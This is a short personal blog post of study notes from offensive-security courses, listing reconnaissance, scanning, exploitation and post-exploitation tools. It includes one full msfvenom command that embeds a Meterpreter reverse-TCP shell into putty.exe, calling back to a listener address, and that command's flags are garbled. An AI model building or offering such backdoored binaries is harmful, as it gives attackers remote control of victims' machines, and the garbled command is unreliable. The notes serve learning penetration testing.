Hi, it is been a while since i write here, sorry about that. Recently i have been doing some courses of offensive security and now i need to put things in order in my head because there is a lot of content. Work in progress.
Passive gathering of information:
1) google dorks! -> https://github.com/ivan-sincek/penetration-testing-cheat-sheet#google-dorks
2) Shodan.io
3) Censys.io
4) theHarvester
5) Maltego
6) recon-ng
7) archive.org
Semi-passive GAthering:
1) Foca. Only windows
2) dnsdumpster
3) centralOps
4) whireshark
5) tcpdump
Active gathering:
1) dnsRecon
2) nmap
3) amap
Vulnerability scan
2) nmap
3) nessus
Exploitation and hacking of hosts
1) metasploit
2) msfvenom
3) pesidous
4) armitage
Exploitation and hacking of websites
1) Burp Suite
2) SQLInjection
4) sqlMap
6) webshells
7) file upload
9) CSRF
10) XSstrike
11) Cookie tampering, command injection
Exploitation and hacking of network vulnerabilities
1) MITM
2) Bettercap
3) ARP Spoofing
4) DNS Spoofing
6) Polymorph. Manipulation of network traffic in real time and programmable.
Post-exploitation techniques
2) Mimicatz
3) UAC bypass
5) backdoors en binarios con msfvenom.
msfvenom -a x86 --platform windows -x putty.exe -k -b windows/meterpreter/reverse_tcp lhost=192.168.242.130 lport=4000 -i 3 -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA" -f exe -o puttyBackdorizado.exe6) Password cracking in hashed form with John the ripper and hashcat
7) session migration using the backdoor.
Machine learning applied to cybersecurity
1) Batea, reconnaissance of hosts based on their impact
2) pesidous, mutating backdoors using the one created by msfVenom. hard to install.
3) Deep fakes.
Aironman techblog 